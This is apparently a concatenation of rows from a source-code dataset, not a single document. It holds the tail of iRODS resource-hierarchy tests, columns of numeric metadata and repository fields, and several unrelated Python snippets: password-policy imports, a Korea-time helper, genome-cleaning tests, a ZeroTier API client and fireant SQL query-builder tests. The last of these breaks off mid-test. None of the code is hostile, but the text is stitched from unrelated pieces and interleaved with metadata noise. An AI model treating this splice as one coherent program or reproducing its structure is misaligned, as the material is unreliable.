self.admin.assert_icommand('iput -fR rrResc ' + filepath + ' ' + dest_path)
self.admin.assert_icommand('ils -L ' + dest_path, 'STDOUT_SINGLELINE', 'rrResc')
self.admin.assert_icommand('iphymv -S unix1Resc -R unix2Resc ' + dest_path)
self.admin.assert_icommand('irm -f ' + dest_path)
self.admin.assert_icommand("iadmin rmchildfromresc rrResc unix2Resc")
self.admin.assert_icommand("iadmin rmchildfromresc rrResc unix1Resc")
self.admin.assert_icommand("iadmin rmresc unix2Resc")
self.admin.assert_icommand("iadmin rmresc unix1Resc")
self.admin.assert_icommand("iadmin rmresc rrResc")
def test_iphymv_to_resc_hier__2933(self):
self.admin.assert_icommand("iadmin mkresc rrResc roundrobin", 'STDOUT_SINGLELINE', 'roundrobin')
self.admin.assert_icommand("iadmin mkresc unix1Resc 'unixfilesystem' " + configuration.HOSTNAME_1 + ":" +
lib.get_irods_top_level_dir() + "/unix1RescVault", 'STDOUT_SINGLELINE', 'unixfilesystem')
self.admin.assert_icommand("iadmin mkresc unix2Resc 'unixfilesystem' " + configuration.HOSTNAME_2 + ":" +
lib.get_irods_top_level_dir() + "/unix2RescVault", 'STDOUT_SINGLELINE', 'unixfilesystem')
self.admin.assert_icommand("iadmin addchildtoresc rrResc unix1Resc")
self.admin.assert_icommand("iadmin addchildtoresc rrResc unix2Resc")
filepath = os.path.join(self.admin.local_session_dir, 'file')
lib.make_file(filepath, 1)
dest_path = self.admin.session_collection + '/file'
self.admin.assert_icommand('iput -fR rrResc ' + filepath + ' ' + dest_path)
self.admin.assert_icommand('ils -L ' + dest_path, 'STDOUT_SINGLELINE', 'rrResc')
self.admin.assert_icommand('iphymv -S "rrResc;unix1Resc" -R "rrResc;unix2Resc" ' + dest_path)
self.admin.assert_icommand('irm -f ' + dest_path)
self.admin.assert_icommand("iadmin rmchildfromresc rrResc unix2Resc")
self.admin.assert_icommand("iadmin rmchildfromresc rrResc unix1Resc")
self.admin.assert_icommand("iadmin rmresc unix2Resc")
self.admin.assert_icommand("iadmin rmresc unix1Resc")
self.admin.assert_icommand("iadmin rmresc rrResc")
| 50.282828
| 136
| 0.696665
| 584
| 4,978
| 5.684932
| 0.17637
| 0.113855
| 0.153614
| 0.235542
| 0.811446
| 0.805723
| 0.779217
| 0.779217
| 0.76747
| 0.741566
| 0
| 0.014721
| 0.194857
| 4,978
| 98
| 137
| 50.795918
| 0.813623
| 0
| 0
| 0.545455
| 0
| 0
| 0.289103
| 0.018094
| 0
| 0
| 0
| 0
| 0.441558
| 0
| null | null | 0
| 0.12987
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
8c174a54b28267cfe4722770a49f3394eea6b032
| 54
|
py
|
Python
|
ex2_1.py
|
riderd/think-python-16
|
8a0cba72a5eabd933e91ae0026fec9dff8b81413
|
[
"Apache-2.0"
] | null | null | null |
ex2_1.py
|
riderd/think-python-16
|
8a0cba72a5eabd933e91ae0026fec9dff8b81413
|
[
"Apache-2.0"
] | null | null | null |
ex2_1.py
|
riderd/think-python-16
|
8a0cba72a5eabd933e91ae0026fec9dff8b81413
|
[
"Apache-2.0"
] | null | null | null |
from ex2 import print_current_day
print_current_day()
| 18
| 33
| 0.87037
| 9
| 54
| 4.777778
| 0.666667
| 0.55814
| 0.697674
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020408
| 0.092593
| 54
| 3
| 34
| 18
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
8c4a3eb2fe4ea8e44c82b198636bd5e03dbd19f9
| 182
|
py
|
Python
|
password_policies/tests/__init__.py
|
hidashun/django-password-policies
|
e215ba46694ea94cc072f4d04e9304a48aa54e22
|
[
"BSD-3-Clause"
] | null | null | null |
password_policies/tests/__init__.py
|
hidashun/django-password-policies
|
e215ba46694ea94cc072f4d04e9304a48aa54e22
|
[
"BSD-3-Clause"
] | null | null | null |
password_policies/tests/__init__.py
|
hidashun/django-password-policies
|
e215ba46694ea94cc072f4d04e9304a48aa54e22
|
[
"BSD-3-Clause"
] | null | null | null |
from password_policies.tests.forms import *
from password_policies.tests.models import *
from password_policies.tests.views import *
from password_policies.tests.middleware import *
| 36.4
| 48
| 0.846154
| 24
| 182
| 6.25
| 0.375
| 0.32
| 0.533333
| 0.666667
| 0.62
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.087912
| 182
| 4
| 49
| 45.5
| 0.903614
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 9
|
8c4dc8c6043647d00563a1b26f3248e035156711
| 465
|
py
|
Python
|
util/KST.py
|
jamakers19/SARS2-Stat-KR
|
a1d336eaf38821173139ef2e1cbdd71dc1dc8e49
|
[
"MIT"
] | 34
|
2020-02-27T13:08:25.000Z
|
2020-08-14T07:46:13.000Z
|
util/KST.py
|
jamakers19/SARS2-Stat-KR
|
a1d336eaf38821173139ef2e1cbdd71dc1dc8e49
|
[
"MIT"
] | 9
|
2020-02-28T08:03:13.000Z
|
2022-03-02T15:02:59.000Z
|
util/KST.py
|
jamakers19/SARS2-Stat-KR
|
a1d336eaf38821173139ef2e1cbdd71dc1dc8e49
|
[
"MIT"
] | 18
|
2020-02-27T16:41:15.000Z
|
2021-06-29T15:05:09.000Z
|
import datetime
from pytz import timezone, utc
def kst_time():
kst = timezone('Asia/Seoul')
now = datetime.datetime.utcnow()
utc.localize(now)
kst.localize(now)
return utc.localize(now).astimezone(kst).strftime("%Y-%m-%d %H:%M:%S")
def kst_time_for_file():
kst = timezone('Asia/Seoul')
now = datetime.datetime.utcnow()
utc.localize(now)
kst.localize(now)
return utc.localize(now).astimezone(kst).strftime("%Y-%m-%d %Hh%Mm")
| 29.0625
| 74
| 0.668817
| 68
| 465
| 4.514706
| 0.382353
| 0.214984
| 0.18241
| 0.130293
| 0.762215
| 0.762215
| 0.762215
| 0.762215
| 0.762215
| 0.762215
| 0
| 0
| 0.15914
| 465
| 16
| 75
| 29.0625
| 0.785166
| 0
| 0
| 0.571429
| 0
| 0
| 0.111588
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.142857
| 0
| 0.428571
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4fe3ab764eb645466acfce8241800e790be08d35
| 9,368
|
py
|
Python
|
tests/test_clean_genome.py
|
dib-lab/charcoal
|
a2b428d3829b761708910fcf97d964b937bef979
|
[
"BSD-3-Clause"
] | 21
|
2020-05-08T20:51:19.000Z
|
2022-02-04T23:00:17.000Z
|
tests/test_clean_genome.py
|
dib-lab/charcoal
|
a2b428d3829b761708910fcf97d964b937bef979
|
[
"BSD-3-Clause"
] | 162
|
2020-03-11T21:32:28.000Z
|
2022-03-09T01:02:14.000Z
|
tests/test_clean_genome.py
|
dib-lab/charcoal
|
a2b428d3829b761708910fcf97d964b937bef979
|
[
"BSD-3-Clause"
] | 1
|
2020-03-11T21:24:13.000Z
|
2020-03-11T21:24:13.000Z
|
import sys
import io
import os.path
from . import pytest_utils as utils
from charcoal import clean_genome
loomba = 'LoombaR_2017__SID1050_bax__bin.11.fa.gz'
def replace_in_hit_list(src, dest, match, replace):
"Adjust the hit list CSV with a quick search/replace."
with open(src, 'rt') as fp:
data = fp.read()
data = data.replace(match, replace)
assert replace in data
with open(dest, 'wt') as fp2:
fp2.write(data)
@utils.in_tempdir
def test_1_loomba(location):
# regression test/check for same results on Loomba
args = utils.Args()
args.genome = utils.relative_file(f"demo/genomes/{loomba}")
args.hit_list = utils.relative_file("tests/test-data/loomba-hit-list.csv")
args.contigs_json = utils.relative_file(f"tests/test-data/loomba/{loomba}.contigs-tax.json")
args.do_nothing = True
clean_out = os.path.join(location, 'clean.fa.gz')
dirty_out = os.path.join(location, 'dirty.fa.gz')
args.clean = clean_out
args.dirty = dirty_out
status = clean_genome.main(args)
assert status == 0
assert os.path.exists(clean_out)
assert os.path.exists(dirty_out)
@utils.in_tempdir
def test_1_loomba_genus(location):
# regression test/check for same results on Loomba
args = utils.Args()
args.genome = utils.relative_file(f"demo/genomes/{loomba}")
args.hit_list = utils.relative_file("tests/test-data/loomba-hit-list.csv")
args.contigs_json = utils.relative_file(f"tests/test-data/loomba/{loomba}.contigs-tax.json")
args.do_nothing = True
clean_out = os.path.join(location, 'clean.fa.gz')
dirty_out = os.path.join(location, 'dirty.fa.gz')
args.clean = clean_out
args.dirty = dirty_out
sys.stdout, old_out = io.StringIO(), sys.stdout
sys.stderr, old_err = io.StringIO(), sys.stderr
try:
status = clean_genome.main(args)
finally:
sys.stdout, new_out = old_out, sys.stdout
sys.stderr, new_err = old_err, sys.stderr
assert status == 0
assert os.path.exists(clean_out)
assert os.path.exists(dirty_out)
out = new_out.getvalue()
assert 'wrote 2727927 clean bp' in out
assert 'wrote 12351 dirty bp' in out
@utils.in_tempdir
def test_1_loomba_family(location):
# regression test/check for same results on Loomba
args = utils.Args()
args.genome = utils.relative_file(f"demo/genomes/{loomba}")
# swap genus for family in the hit list --
src = utils.relative_file("tests/test-data/loomba-hit-list.csv")
hit_list = os.path.join(location, 'loomba-hit-list.csv')
replace_in_hit_list(src, hit_list, ',genus,,', ',family,,')
args.hit_list = hit_list
args.contigs_json = utils.relative_file(f"tests/test-data/loomba/{loomba}.contigs-tax.json")
args.do_nothing = True
clean_out = os.path.join(location, 'clean.fa.gz')
dirty_out = os.path.join(location, 'dirty.fa.gz')
args.clean = clean_out
args.dirty = dirty_out
sys.stdout, old_out = io.StringIO(), sys.stdout
sys.stderr, old_err = io.StringIO(), sys.stderr
try:
status = clean_genome.main(args)
finally:
sys.stdout, new_out = old_out, sys.stdout
sys.stderr, new_err = old_err, sys.stderr
assert status == 0
assert os.path.exists(clean_out)
assert os.path.exists(dirty_out)
out = new_out.getvalue()
print(out)
assert 'wrote 2730931 clean bp' in out
assert 'wrote 9347 dirty bp' in out
@utils.in_tempdir
def test_1_loomba_order(location):
# regression test/check for same results on Loomba
args = utils.Args()
args.genome = utils.relative_file(f"demo/genomes/{loomba}")
# swap genus for order in the hit list --
src = utils.relative_file("tests/test-data/loomba-hit-list.csv")
hit_list = os.path.join(location, 'loomba-hit-list.csv')
replace_in_hit_list(src, hit_list, ',genus,,', ',order,,')
args.hit_list = hit_list
args.contigs_json = utils.relative_file(f"tests/test-data/loomba/{loomba}.contigs-tax.json")
args.do_nothing = True
clean_out = os.path.join(location, 'clean.fa.gz')
dirty_out = os.path.join(location, 'dirty.fa.gz')
args.clean = clean_out
args.dirty = dirty_out
sys.stdout, old_out = io.StringIO(), sys.stdout
sys.stderr, old_err = io.StringIO(), sys.stderr
try:
status = clean_genome.main(args)
finally:
sys.stdout, new_out = old_out, sys.stdout
sys.stderr, new_err = old_err, sys.stderr
assert status == 0
assert os.path.exists(clean_out)
assert os.path.exists(dirty_out)
out = new_out.getvalue()
print(out)
assert 'wrote 2732992 clean bp' in out
assert 'wrote 7286 dirty bp' in out
@utils.in_tempdir
def test_1_loomba_class(location):
# regression test/check for same results on Loomba
args = utils.Args()
args.genome = utils.relative_file(f"demo/genomes/{loomba}")
# swap genus for class in the hit list --
src = utils.relative_file("tests/test-data/loomba-hit-list.csv")
hit_list = os.path.join(location, 'loomba-hit-list.csv')
replace_in_hit_list(src, hit_list, ',genus,,', ',class,,')
args.hit_list = hit_list
args.contigs_json = utils.relative_file(f"tests/test-data/loomba/{loomba}.contigs-tax.json")
args.do_nothing = True
clean_out = os.path.join(location, 'clean.fa.gz')
dirty_out = os.path.join(location, 'dirty.fa.gz')
args.clean = clean_out
args.dirty = dirty_out
sys.stdout, old_out = io.StringIO(), sys.stdout
sys.stderr, old_err = io.StringIO(), sys.stderr
try:
status = clean_genome.main(args)
finally:
sys.stdout, new_out = old_out, sys.stdout
sys.stderr, new_err = old_err, sys.stderr
print(new_out.getvalue())
assert status == 0
assert os.path.exists(clean_out)
assert os.path.exists(dirty_out)
out = new_out.getvalue()
assert 'wrote 2740278 clean bp' in out
assert 'wrote 0 dirty bp' in out
@utils.in_tempdir
def test_1_loomba_none(location):
# regression test/check for same results on Loomba
args = utils.Args()
args.genome = utils.relative_file("demo/genomes/LoombaR_2017__SID1050_bax__bin.11.fa.gz")
# swap genus for none in the hit list --
src = utils.relative_file("tests/test-data/loomba-hit-list.csv")
hit_list = os.path.join(location, 'loomba-hit-list.csv')
replace_in_hit_list(src, hit_list, ',genus,,', ',none,,')
args.hit_list = hit_list
args.contigs_json = utils.relative_file(f"tests/test-data/loomba/{loomba}.contigs-tax.json")
args.do_nothing = True
clean_out = os.path.join(location, 'clean.fa.gz')
dirty_out = os.path.join(location, 'dirty.fa.gz')
args.clean = clean_out
args.dirty = dirty_out
sys.stdout, old_out = io.StringIO(), sys.stdout
sys.stderr, old_err = io.StringIO(), sys.stderr
try:
status = clean_genome.main(args)
finally:
sys.stdout, new_out = old_out, sys.stdout
sys.stderr, new_err = old_err, sys.stderr
print(new_out.getvalue())
assert status == 0
assert os.path.exists(clean_out)
assert os.path.exists(dirty_out)
out = new_out.getvalue()
assert 'wrote 2740278 clean bp' in out
@utils.in_tempdir
def test_1_loomba_order_override(location):
# regression test/check for same results on Loomba; this uses
# the override column.
args = utils.Args()
args.genome = utils.relative_file(f"tests/test-data/{loomba}")
# override genus for order in the hit list --
src = utils.relative_file("tests/test-data/loomba-hit-list.csv")
hit_list = os.path.join(location, 'loomba-hit-list.csv')
replace_in_hit_list(src, hit_list, ',genus,,', ',genus,order,')
args.hit_list = hit_list
args.contigs_json = utils.relative_file(f"tests/test-data/loomba/{loomba}.contigs-tax.json")
args.do_nothing = True
clean_out = os.path.join(location, 'clean.fa.gz')
dirty_out = os.path.join(location, 'dirty.fa.gz')
args.clean = clean_out
args.dirty = dirty_out
sys.stdout, old_out = io.StringIO(), sys.stdout
sys.stderr, old_err = io.StringIO(), sys.stderr
try:
status = clean_genome.main(args)
finally:
sys.stdout, new_out = old_out, sys.stdout
sys.stderr, new_err = old_err, sys.stderr
assert status == 0
assert os.path.exists(clean_out)
assert os.path.exists(dirty_out)
out = new_out.getvalue()
print(out)
assert 'wrote 2732992 clean bp' in out
assert 'wrote 7286 dirty bp' in out
@utils.in_tempdir
def test_2_gca_empty(location):
# regression test/check for same results on Loomba
args = utils.Args()
args.genome = utils.relative_file(f"demo/genomes/GCA_001593925.1_ASM159392v1_genomic.fna.gz")
args.hit_list = utils.relative_file("tests/test-data/GCA_001593925_hit-list.csv")
# create and use empty JSON file
empty_json = os.path.join(location, 'empty.json')
with open(empty_json, 'wt') as fp:
fp.write('{}')
args.contigs_json = empty_json
args.do_nothing = False
clean_out = os.path.join(location, 'clean.fa.gz')
dirty_out = os.path.join(location, 'dirty.fa.gz')
args.clean = clean_out
args.dirty = dirty_out
status = clean_genome.main(args)
assert status == 0
assert os.path.exists(clean_out)
assert os.path.exists(dirty_out)
| 32.19244
| 97
| 0.683604
| 1,431
| 9,368
| 4.31167
| 0.080363
| 0.054457
| 0.063371
| 0.064182
| 0.903566
| 0.900486
| 0.891248
| 0.88671
| 0.869368
| 0.848136
| 0
| 0.016385
| 0.192143
| 9,368
| 290
| 98
| 32.303448
| 0.79889
| 0.076003
| 0
| 0.804762
| 0
| 0
| 0.178169
| 0.10329
| 0
| 0
| 0
| 0
| 0.171429
| 1
| 0.042857
| false
| 0
| 0.02381
| 0
| 0.066667
| 0.02381
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8c90e5ad0f89db3653dd5fee8b1f8cb6c132ddf1
| 3,274
|
py
|
Python
|
usr/local/lib/python3.6/dist-packages/zerotier/network_service.py
|
threefoldtech/threebot_prebuilt
|
1f0e1c65c14cef079cd80f73927d7c8318755c48
|
[
"Apache-2.0"
] | 11
|
2017-11-26T20:28:31.000Z
|
2021-06-08T18:26:55.000Z
|
usr/local/lib/python3.6/dist-packages/zerotier/network_service.py
|
threefoldtech/threebot_prebuilt
|
1f0e1c65c14cef079cd80f73927d7c8318755c48
|
[
"Apache-2.0"
] | 2
|
2016-11-01T04:42:39.000Z
|
2016-11-01T04:46:57.000Z
|
usr/local/lib/python3.6/dist-packages/zerotier/network_service.py
|
threefoldtech/threebot_prebuilt
|
1f0e1c65c14cef079cd80f73927d7c8318755c48
|
[
"Apache-2.0"
] | 2
|
2018-06-12T05:13:32.000Z
|
2021-03-17T09:21:33.000Z
|
class NetworkService:
def __init__(self, client):
self.client = client
def deleteMember(self, address, id, headers=None, query_params=None, content_type="application/json"):
"""
Delete member from network
It is method for DELETE /network/{id}/member/{address}
"""
uri = self.client.base_url + "/network/"+id+"/member/"+address
return self.client.delete(uri, None, headers, query_params, content_type)
def getMember(self, address, id, headers=None, query_params=None, content_type="application/json"):
"""
Get network member settings
It is method for GET /network/{id}/member/{address}
"""
uri = self.client.base_url + "/network/"+id+"/member/"+address
return self.client.get(uri, None, headers, query_params, content_type)
def updateMember(self, data, address, id, headers=None, query_params=None, content_type="application/json"):
"""
Update member settings
It is method for POST /network/{id}/member/{address}
"""
uri = self.client.base_url + "/network/"+id+"/member/"+address
return self.client.post(uri, data, headers, query_params, content_type)
def listMembers(self, id, headers=None, query_params=None, content_type="application/json"):
"""
Get a list of network members
It is method for GET /network/{id}/member
"""
uri = self.client.base_url + "/network/"+id+"/member"
return self.client.get(uri, None, headers, query_params, content_type)
def deleteNetwork(self, id, headers=None, query_params=None, content_type="application/json"):
"""
Delete network
It is method for DELETE /network/{id}
"""
uri = self.client.base_url + "/network/"+id
return self.client.delete(uri, None, headers, query_params, content_type)
def getNetwork(self, id, headers=None, query_params=None, content_type="application/json"):
"""
Get network configuration and status information
It is method for GET /network/{id}
"""
uri = self.client.base_url + "/network/"+id
return self.client.get(uri, None, headers, query_params, content_type)
def updateNetwork(self, data, id, headers=None, query_params=None, content_type="application/json"):
"""
Update network configuration
It is method for POST /network/{id}
"""
uri = self.client.base_url + "/network/"+id
return self.client.post(uri, data, headers, query_params, content_type)
def listNetworks(self, headers=None, query_params=None, content_type="application/json"):
"""
Get a list of networks this user owns or can view/edit
It is method for GET /network
"""
uri = self.client.base_url + "/network"
return self.client.get(uri, None, headers, query_params, content_type)
def createNetwork(self, data, headers=None, query_params=None, content_type="application/json"):
"""
Create a new network
It is method for POST /network
"""
uri = self.client.base_url + "/network"
return self.client.post(uri, data, headers, query_params, content_type)
| 38.069767
| 112
| 0.640806
| 409
| 3,274
| 5.00978
| 0.146699
| 0.097609
| 0.070278
| 0.096633
| 0.849683
| 0.846266
| 0.816496
| 0.792094
| 0.726696
| 0.701318
| 0
| 0
| 0.237935
| 3,274
| 85
| 113
| 38.517647
| 0.821242
| 0.197923
| 0
| 0.566667
| 0
| 0
| 0.108269
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8ca8dbd3078142d2adbb5e2bf5627b4cac00b26e
| 26,723
|
py
|
Python
|
fireant/tests/slicer/query_builder/test_build_dimensions.py
|
vladaspasic/fireant
|
2dbae6a97a927ef62fdcd5f37fcb51a7d6d55334
|
[
"Apache-2.0"
] | null | null | null |
fireant/tests/slicer/query_builder/test_build_dimensions.py
|
vladaspasic/fireant
|
2dbae6a97a927ef62fdcd5f37fcb51a7d6d55334
|
[
"Apache-2.0"
] | null | null | null |
fireant/tests/slicer/query_builder/test_build_dimensions.py
|
vladaspasic/fireant
|
2dbae6a97a927ef62fdcd5f37fcb51a7d6d55334
|
[
"Apache-2.0"
] | null | null | null |
from unittest import TestCase
from datetime import date
import fireant as f
from ..mocks import slicer
# noinspection SqlDialectInspection,SqlNoDataSourceInspection
class QueryBuilderDimensionTests(TestCase):
maxDiff = None
def test_build_query_with_datetime_dimension(self):
queries = slicer.data \
.widget(f.DataTablesJS(slicer.metrics.votes)) \
.dimension(slicer.dimensions.timestamp) \
.queries
self.assertEqual(len(queries), 1)
self.assertEqual('SELECT '
'TRUNC("timestamp",\'DD\') "$d$timestamp",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$timestamp" '
'ORDER BY "$d$timestamp"', str(queries[0]))
def test_build_query_with_datetime_dimension_hourly(self):
queries = slicer.data \
.widget(f.DataTablesJS(slicer.metrics.votes)) \
.dimension(slicer.dimensions.timestamp(f.hourly)) \
.queries
self.assertEqual(len(queries), 1)
self.assertEqual('SELECT '
'TRUNC("timestamp",\'HH\') "$d$timestamp",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$timestamp" '
'ORDER BY "$d$timestamp"', str(queries[0]))
def test_build_query_with_datetime_dimension_daily(self):
queries = slicer.data \
.widget(f.DataTablesJS(slicer.metrics.votes)) \
.dimension(slicer.dimensions.timestamp(f.daily)) \
.queries
self.assertEqual(len(queries), 1)
self.assertEqual('SELECT '
'TRUNC("timestamp",\'DD\') "$d$timestamp",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$timestamp" '
'ORDER BY "$d$timestamp"', str(queries[0]))
def test_build_query_with_datetime_dimension_weekly(self):
queries = slicer.data \
.widget(f.DataTablesJS(slicer.metrics.votes)) \
.dimension(slicer.dimensions.timestamp(f.weekly)) \
.queries
self.assertEqual(len(queries), 1)
self.assertEqual('SELECT '
'TRUNC("timestamp",\'IW\') "$d$timestamp",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$timestamp" '
'ORDER BY "$d$timestamp"', str(queries[0]))
def test_build_query_with_datetime_dimension_monthly(self):
queries = slicer.data \
.widget(f.DataTablesJS(slicer.metrics.votes)) \
.dimension(slicer.dimensions.timestamp(f.monthly)) \
.queries
self.assertEqual(len(queries), 1)
self.assertEqual('SELECT '
'TRUNC("timestamp",\'MM\') "$d$timestamp",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$timestamp" '
'ORDER BY "$d$timestamp"', str(queries[0]))
def test_build_query_with_datetime_dimension_quarterly(self):
queries = slicer.data \
.widget(f.DataTablesJS(slicer.metrics.votes)) \
.dimension(slicer.dimensions.timestamp(f.quarterly)) \
.queries
self.assertEqual(len(queries), 1)
self.assertEqual('SELECT '
'TRUNC("timestamp",\'Q\') "$d$timestamp",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$timestamp" '
'ORDER BY "$d$timestamp"', str(queries[0]))
def test_build_query_with_datetime_dimension_annually(self):
queries = slicer.data \
.widget(f.DataTablesJS(slicer.metrics.votes)) \
.dimension(slicer.dimensions.timestamp(f.annually)) \
.queries
self.assertEqual(len(queries), 1)
self.assertEqual('SELECT '
'TRUNC("timestamp",\'Y\') "$d$timestamp",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$timestamp" '
'ORDER BY "$d$timestamp"', str(queries[0]))
def test_build_query_with_boolean_dimension(self):
queries = slicer.data \
.widget(f.DataTablesJS(slicer.metrics.votes)) \
.dimension(slicer.dimensions.winner) \
.queries
self.assertEqual(len(queries), 1)
self.assertEqual('SELECT '
'"is_winner" "$d$winner",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$winner" '
'ORDER BY "$d$winner"', str(queries[0]))
def test_build_query_with_categorical_dimension(self):
queries = slicer.data \
.widget(f.DataTablesJS(slicer.metrics.votes)) \
.dimension(slicer.dimensions.political_party) \
.queries
self.assertEqual(len(queries), 1)
self.assertEqual('SELECT '
'"political_party" "$d$political_party",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$political_party" '
'ORDER BY "$d$political_party"', str(queries[0]))
def test_build_query_with_unique_dimension(self):
queries = slicer.data \
.widget(f.DataTablesJS(slicer.metrics.votes)) \
.dimension(slicer.dimensions.election) \
.queries
self.assertEqual(len(queries), 1)
self.assertEqual('SELECT '
'"election_id" "$d$election",'
'"election_year" "$d$election_display",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$election","$d$election_display" '
'ORDER BY "$d$election_display"', str(queries[0]))
def test_build_query_with_multiple_dimensions(self):
queries = slicer.data \
.widget(f.DataTablesJS(slicer.metrics.votes)) \
.dimension(slicer.dimensions.timestamp) \
.dimension(slicer.dimensions.candidate) \
.queries
self.assertEqual(len(queries), 1)
self.assertEqual('SELECT '
'TRUNC("timestamp",\'DD\') "$d$timestamp",'
'"candidate_id" "$d$candidate",'
'"candidate_name" "$d$candidate_display",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$timestamp","$d$candidate","$d$candidate_display" '
'ORDER BY "$d$timestamp","$d$candidate_display"', str(queries[0]))
def test_build_query_with_multiple_dimensions_and_visualizations(self):
queries = slicer.data \
.widget(f.DataTablesJS(slicer.metrics.votes, slicer.metrics.wins)) \
.widget(f.HighCharts()
.axis(f.HighCharts.LineSeries(slicer.metrics.votes))
.axis(f.HighCharts.LineSeries(slicer.metrics.wins))) \
.dimension(slicer.dimensions.timestamp) \
.dimension(slicer.dimensions.political_party) \
.queries
self.assertEqual(len(queries), 1)
self.assertEqual('SELECT '
'TRUNC("timestamp",\'DD\') "$d$timestamp",'
'"political_party" "$d$political_party",'
'SUM("votes") "$m$votes",'
'SUM("is_winner") "$m$wins" '
'FROM "politics"."politician" '
'GROUP BY "$d$timestamp","$d$political_party" '
'ORDER BY "$d$timestamp","$d$political_party"', str(queries[0]))
# noinspection SqlDialectInspection,SqlNoDataSourceInspection
class QueryBuilderDimensionTotalsTests(TestCase):
maxDiff = None
def test_build_query_with_totals_cat_dimension(self):
queries = slicer.data \
.widget(f.DataTablesJS(slicer.metrics.votes)) \
.dimension(slicer.dimensions.political_party.rollup()) \
.queries
self.assertEqual(len(queries), 2)
with self.subTest('base query is same as without references or totals'):
self.assertEqual('SELECT '
'"political_party" "$d$political_party",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$political_party" '
'ORDER BY "$d$political_party"', str(queries[0]))
with self.subTest('totals dimension is replaced with NULL'):
self.assertEqual('SELECT '
'NULL "$d$political_party",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'ORDER BY "$d$political_party"', str(queries[1]))
def test_build_query_with_totals_uni_dimension(self):
queries = slicer.data \
.widget(f.DataTablesJS(slicer.metrics.votes)) \
.dimension(slicer.dimensions.candidate.rollup()) \
.queries
self.assertEqual(len(queries), 2)
with self.subTest('base query is same as without references or totals'):
self.assertEqual('SELECT '
'"candidate_id" "$d$candidate",'
'"candidate_name" "$d$candidate_display",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$candidate","$d$candidate_display" '
'ORDER BY "$d$candidate_display"', str(queries[0]))
with self.subTest('totals dimension is replaced with NULL'):
self.assertEqual('SELECT '
'NULL "$d$candidate",'
'NULL "$d$candidate_display",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'ORDER BY "$d$candidate_display"', str(queries[1]))
def test_build_query_with_totals_on_dimension_and_subsequent_dimensions(self):
queries = slicer.data \
.widget(f.DataTablesJS(slicer.metrics.votes)) \
.dimension(slicer.dimensions.timestamp,
slicer.dimensions.candidate.rollup(),
slicer.dimensions.political_party) \
.queries
self.assertEqual(len(queries), 2)
with self.subTest('base query is same as without references or totals'):
self.assertEqual('SELECT '
'TRUNC("timestamp",\'DD\') "$d$timestamp",'
'"candidate_id" "$d$candidate",'
'"candidate_name" "$d$candidate_display",'
'"political_party" "$d$political_party",'
'SUM("votes") "$m$votes" '
'FROM "politics"."politician" '
'GROUP BY "$d$timestamp","$d$candidate","$d$candidate_display","$d$political_party" '
'ORDER BY "$d$timestamp","$d$candidate_display","$d$political_party"', str(queries[0]))
with self.subTest('all dimensions after the rolled up dimension are NULL'):
